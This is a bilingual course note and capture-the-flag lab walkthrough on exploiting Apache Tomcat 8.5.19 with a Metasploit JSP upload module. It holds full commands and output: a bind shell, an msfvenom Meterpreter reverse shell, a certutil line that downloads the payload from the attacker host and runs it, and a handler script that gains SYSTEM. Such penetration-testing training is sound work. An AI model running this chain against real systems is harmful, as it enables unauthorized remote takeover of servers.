Exploiting A Vulnerable Apache Tomcat Web Server
Exploiting Apache Tomcat
Apache Tomcat, also known as Tomcat server, is a popular, free and open source Java servlet web server.
It is used to build and host dynamic websites and web applications based on the Java software platform.
Apache Tomcat utilizes the HTTP protocol to facilitate the underlying communication between the server and clients.
Apache Tomcat runs on TCP port 8080 by default.
The standard Apache HTTP web server is used to host static and dynamic websites or web applications, typically developed in PHP.
The Apache Tomcat web server is primarily used to host dynamic websites or web applications developed in Java.
Apache Tomcat V8.5.19 is vulnerable to a remote code execution vulnerability that could potentially allow an attacker to upload and execute a JSP payload in order to gain remote access to the target server.
We can utilize a prebuilt MSF exploit module to exploit this vulnerability and consequently gain access to the target server.
利用易受攻击的 Apache Tomcat Web 服务器
利用 Apache Tomcat
Apache Tomcat,也称为 Tomcat 服务器,是一种流行的、免费的开源 Java servlet Web 服务器。
它用于构建和托管基于 Java 软件平台的动态网站和 Web 应用程序。
Apache Tomcat 利用 HTTP 协议促进服务器和客户端之间的底层通信。
Apache Tomcat 默认在 TCP 端口 8080 上运行。
标准的 Apache HTTP Web 服务器用于托管静态和动态网站或 Web 应用程序,通常使用 PHP 开发。
Apache Tomcat Web 服务器主要用于托管用 Java 开发的动态网站或 Web 应用程序。
Apache Tomcat V8.5.19 容易受到远程代码执行漏洞的影响,该漏洞可能允许攻击者上传和执行 JSP 负载以获得对目标服务器的远程访问权限。
我们可以利用预构建的 MSF 利用模块来利用此漏洞,从而获得对目标服务器的访问权限。
Demo: Exploiting A Vulnerable Apache Tomcat Web Server(演示:利用易受攻击的 Apache Tomcat Web 服务器)
JSP: Java Service Page
Target IP Address: 10.2.20.126
Kali Linux: 10.10.5.4
Ensure that we can interact with the Metasploit Framework database and consequently create workspaces and store data within those workspaces.
1
service postgresql start
1
msfconsole
Create a workspace.
1
workspace -a tomcat
Set our global variable for the RHOSTS value. This will save us time whenever we’re loading any modules, as the RHOSTS value will be set globally for any modules that we load.
1
setg RHOSTS 10.2.20.126
Check our workspaces.
1
workspace
The first step will involve port scanning and enumeration, because we need to identify whether Apache Tomcat is running on the target system.
db_nmap command will perform an Nmap scan within the Metasploit Framework console, and consequently store the Nmap results into the Metasploit Framework database within our current workspace.
-sS: Perform a SYN scan.
-sV: Perform service detection.
-O: Perform the operating system detection.
1
db_nmap -sS -sV -O 10.2.20.126
From the results that the target system is running Windows. And on port 8080, we have Apache Tomcat 8.5.19, which is vulnerable to a remote code execution vulnerability.
Access these services on the target system that we just performed an Nmap scan on by typing in the services command.
Search for the exploit module that we can use to exploit this specific version of Apache Tomcat.
1
search type:exploit tomcat_jsp
1
2
use exploit/multi/http/tomcat_jsp_upload_bypass
show options
If we open up our browser, we can confirm that we have Tomcat running.
1
http://10.2.20.126:8080
Another piece of information is not provided. And that is the payload that we can utilize to obtain a reverse shell or a Meterpreter session.
Tomcat RCE via JSP Upload Bypass
Tomcat RCE via JSP Upload Bypass
This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
Tomcat RCE 通过 JSP 上传绕过
该模块使用 PUT 请求绕过将 jsp shell 上传到易受攻击的 Apache Tomcat 配置。
1
info
“This module uploads a jsp payload and execute it.”
It will upload a JSP file, which is a Java Service Page payload, which means we cannot utilize a Meterpreter payload out of the box, and we instead have to utilize a Java JSP shell payload, which we can specify.
This is a nonstaged payload.
1
set payload java/jsp_shell_bind_tcp
And we’re going to be taking a look at how to get a Meterpreter session once we’ve gained access.
1
show options
Payload options (jave/jsp_shell_bind_tcp)
LPORT: The port of the target system that we want to listen on for the remote connection. (Because it’s a bind shell.)
RHOST: The target address.
SHELL: Allow us to specify the system shell to use.
And given the fact that the target system is running Windows, we can set the shell we want to use to cmd, as Windows utilize cmd.
1
2
set SHELL cmd
run
If that doesn’t work, we can terminate the execution and run it again, as this particular exploit module will take a few tries in order for it to work.
We now have a command prompt session on the target system, not a Meterpreter session, but we can still run Windows commands.
1
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
Get our current privileges.
1
C:\Program Files\Apache Software Foundation\Tomcat 8.5>whoami
We have nt authority\system privileges, which means we have the highest privileges available on a Windows system.
However, this is not a convenient way of accessing the target. We typically want to obtain an Meterpreter session because of all of the functionality that Meterpreter affords or provides to us.
Because this is a command shell session, we can put it in the background using the Ctrl+Z keys on your keyboard.
List out our sessions, the type of payload is specified as java/linux, which means even if we try and change or upgrade our shell into a Meterpreter session through the use of a built in post exploitation module, this will not work.
1
sessions
What can we do here? And this is where the technique that we covered during the client-side exploitation section will come into handy. And that is the technique of generating payloads with msfvenom.
Generate a Windows Meterpreter payload with msfvenom, and then upload it to the target through our command shell session. And we are then going to execute it on the target system. And we should receive a Meterpreter session on our handler. So we’ll also have to set up a handler.
In order to do this, we want to persist this MSF console session. So we are going to open up a new tab within the terminal.
Target IP Address: 10.2.20.126
Kali Linux: 10.10.5.4
1
pwd
-p: Specify the payload.
-f: the output format.
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.4 LPORT=1234 -f exe > meterpreter.exe
We need to transfer this meterpreter.exe payload onto the target system.
How can we do this? One of the techniques that we can utilize is the technique of setting up a web server on the Kali Linux system to host this file and then download the file on the target through an in-built Windows utility, because, we don’t have a Meterpreter session. That’s what we’re trying to establish.
Set up a simple web server within our current working directory to host the meterpreter.exe payload.
1
sudo python -m SimpleHTTPServer 80
Head back to our first tab, where we have access to the target via command shell, we can interact with the session.
1
sessions 1
In order to download this particular meterpreter.exe payload from the Kali Linux web server that we have set up, we’re going to utilize an in-built Windows utility called certutil, which can allow us, in this case, to download files from remote systems.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
-URLCache
CertUtil [Options] -URLCache [URL | CRL | * [delete]]
Display or delete URL cache entries
URL: cached URL
CRL: operate on all cached CRL URLs only
*: operate on all cached URLs
delete: delete relevant URLs from the current user's local cache
Use -f to force fetching a specific URL and updating the cache.
[-f] [-split]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
-URLCache
CertUtil [选项] -URLCache [URL | CRL | * [delete]]
显示或删除 URL 缓存条目
URL:缓存的网址
CRL:仅对所有缓存的 CRL URL 进行操作
*:对所有缓存的 URL 进行操作
delete:从当前用户的本地缓存中删除相关的URL
使用 -f 强制获取特定 URL 并更新缓存。
[-f] [-split]
-f: the file flag.
1
2
C:\Program Files\Apache Software Foundation\Tomcat 8.5>certutil -urlcache -f http://10.10.5.4/meterpreter.exe meterpreter.exe
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
Set up our handler to receive the connection once we execute our meterpreter payload on the target system.
In order to do this, we can create a Metasploit RC script.
1
vim handler.rc
1
2
3
4
5
6
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.5.4
set LPORT 1234
run
:wq
-r: Load the resource script.
1
msfconsole -r handler.rc
That’s going to set up our listener automatically.
We can now execute the meterpreter.exe payload on the target system.
1
C:\Program Files\Apache Software Foundation\Tomcat 8.5>.\meterpreter.exe
It’s executed successfully.
We get a Meterpreter session opened on the target system.
getuid: get user id.
The permissions we have available are NT AUTHORITY\SYSTEM, which are the highest level of privileges.
1
2
meterpreter > sysinfo
meterpreter > getuid
And we’ve been able to obtain a Meterpreter session by utilizing an exploit module that did not allow us to specify a Meterpreter payload.
That’s how to utilize all of the techniques that we’ve learned so far in regards to creating or generating payloads with msfvenom. And you’ve learned a few new techniques like how to transfer files from a Linux system onto a Windows system through the use of the certutil utility. So we’ve gained access to the target system by exploiting the Apache Tomcat web server. And then we utilized our knowledge of generating payloads to generate a Meterpreter payload, transfer it over to the target, set up our handler, execute the payload on the target through our command shell session in order to receive a Meterpreter session, which is much better than having a command shell session.
Windows: Java Web Server
Overview
A Kali GUI machine and a target machine running a vulnerable java web server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.
Objective: Exploit the application and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1948.pdf
我自己的思路
1
2
3
4
5
Target IP Address : 10.0.25.99
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.16.2 netmask 255.255.255.0 broadcast 10.10.16.255
ether 02:42:0a:0a:10:02 txqueuelen 0 (Ethernet)
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a tomcat
[*] Added workspace: tomcat
[*] Workspace: tomcat
msf5 > setg RHOSTS 10.0.25.99
RHOSTS => 10.0.25.99
msf5 > workspace
default
* tomcat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 > db_nmap -sS -sV -O 10.0.25.99
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-31 08:47 IST
[*] Nmap: Nmap scan report for 10.0.25.99
[*] Nmap: Host is up (0.0026s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8080/tcp open http Apache Tomcat 8.5.19
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/31%OT=135%CT=1%CU=42098%PV=Y%DS=3%DC=I%G=Y%TM=63D888
[*] Nmap: OS:8F%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.85 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.25.99 135 tcp msrpc open Microsoft Windows RPC
10.0.25.99 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.25.99 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.25.99 3389 tcp ssl/ms-wbt-server open
10.0.25.99 8009 tcp ajp13 open Apache Jserv Protocol v1.3
10.0.25.99 8080 tcp http open Apache Tomcat 8.5.19
10.0.25.99 49152 tcp msrpc open Microsoft Windows RPC
10.0.25.99 49153 tcp msrpc open Microsoft Windows RPC
10.0.25.99 49154 tcp msrpc open Microsoft Windows RPC
10.0.25.99 49155 tcp msrpc open Microsoft Windows RPC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 > search type:exploit tomcat_jsp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
msf5 > use exploit/multi/http/tomcat_jsp_upload_bypass
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > show options
Module options (exploit/multi/http/tomcat_jsp_upload_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.25.99 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path of the Tomcat installation
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > info
Name: Tomcat RCE via JSP Upload Bypass
Module: exploit/multi/http/tomcat_jsp_upload_bypass
Platform: Linux, Windows
Arch:
Privileged: No
Available targets:
Id Name
-- ----
0 Automatic
1 Java Windows
2 Java Linux
Payload information:
Description:
This module uploads a jsp payload and executes it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp
payload => java/jsp_shell_bind_tcp
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > show options
Module options (exploit/multi/http/tomcat_jsp_upload_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.25.99 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path of the Tomcat installation
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.0.25.99 no The target address
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > set SHELL cmd
SHELL => cmd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > run
[*] Uploading payload...
[-] Exploit aborted due to failure: payload-failed: Failed to execute the payload
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > run
[*] Uploading payload...
[*] Payload executed!
[*] Started bind TCP handler against 10.0.25.99:4444
[*] Command shell session 1 opened (10.10.16.2:36173 -> 10.0.25.99:4444) at 2023-01-31 08:59:28 +0530
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of C:\Program Files\Apache Software Foundation\Tomcat 8.5
09/16/2020 06:00 AM <DIR> .
09/16/2020 06:00 AM <DIR> ..
09/16/2020 06:00 AM <DIR> bin
09/16/2020 06:02 AM <DIR> conf
09/16/2020 06:00 AM <DIR> lib
07/24/2017 09:01 PM 58,153 LICENSE
01/31/2023 03:10 AM <DIR> logs
07/24/2017 09:01 PM 1,774 NOTICE
07/24/2017 09:01 PM 7,241 RELEASE-NOTES
09/16/2020 06:00 AM <DIR> temp
07/24/2017 09:01 PM 21,630 tomcat.ico
07/24/2017 09:01 PM 73,624 Uninstall.exe
09/16/2020 06:00 AM <DIR> webapps
09/16/2020 06:00 AM <DIR> work
5 File(s) 162,422 bytes
9 Dir(s) 8,762,023,936 bytes free
1
2
3
4
5
C:\Program Files\Apache Software Foundation\Tomcat 8.5>whoami
whoami
nt authority\system
C:\Program Files\Apache Software Foundation\Tomcat 8.5>^Z
Background session 1? [y/N] y
1
2
3
4
5
6
7
8
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux 10.10.16.2:36173 -> 10.0.25.99:4444 (10.0.25.99)
1
2
3
4
5
6
7
8
root@attackdefense:~# pwd
/root
root@attackdefense:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=1234 -f exe > meterpreter.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
1
2
3
root@attackdefense:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
1
2
3
4
C:\Program Files\Apache Software Foundation\Tomcat 8.5>certutil -urlcache -f http://10.10.16.2/meterpreter.exe meterpreter.exe
certutil -urlcache -f http://10.10.16.2/meterpreter.exe meterpreter.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of C:\Program Files\Apache Software Foundation\Tomcat 8.5
01/31/2023 03:48 AM <DIR> .
01/31/2023 03:48 AM <DIR> ..
09/16/2020 06:00 AM <DIR> bin
09/16/2020 06:02 AM <DIR> conf
09/16/2020 06:00 AM <DIR> lib
07/24/2017 09:01 PM 58,153 LICENSE
01/31/2023 03:10 AM <DIR> logs
01/31/2023 03:48 AM 73,802 meterpreter.exe
07/24/2017 09:01 PM 1,774 NOTICE
07/24/2017 09:01 PM 7,241 RELEASE-NOTES
09/16/2020 06:00 AM <DIR> temp
07/24/2017 09:01 PM 21,630 tomcat.ico
07/24/2017 09:01 PM 73,624 Uninstall.exe
09/16/2020 06:00 AM <DIR> webapps
09/16/2020 06:00 AM <DIR> work
6 File(s) 236,224 bytes
9 Dir(s) 8,856,035,328 bytes free
1
2
3
4
root@attackdefense:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.25.99 - - [31/Jan/2023 09:17:59] "GET /meterpreter.exe HTTP/1.1" 200 -
10.0.25.99 - - [31/Jan/2023 09:18:00] "GET /meterpreter.exe HTTP/1.1" 200 -
1
2
3
4
5
6
root@attackdefense:~# vim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.16.2
set LPORT 1234
run
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# msfconsole -q -r handler.rc
[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use multi/handler
resource (handler.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 10.10.16.2
LHOST => 10.10.16.2
resource (handler.rc)> set LPORT 1234
LPORT => 1234
resource (handler.rc)> run
[*] Started reverse TCP handler on 10.10.16.2:1234
1
2
C:\Program Files\Apache Software Foundation\Tomcat 8.5>.\meterpreter.exe
.\meterpreter.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
resource (handler.rc)> run
[*] Started reverse TCP handler on 10.10.16.2:1234
[*] Sending stage (180291 bytes) to 10.0.25.99
[*] Meterpreter session 1 opened (10.10.16.2:1234 -> 10.0.25.99:49367) at 2023-01-31 09:26:12 +0530
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
1
2
3
4
5
meterpreter > search -f flag.txt
Found 1 result...
c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
92d60a06d0ea2179c9a8c442c0bd0bc0
-
Previous
Exploiting WinRM (Windows Remote Management Protocol) -
Next
Exploiting A Vulnerable FTP Server
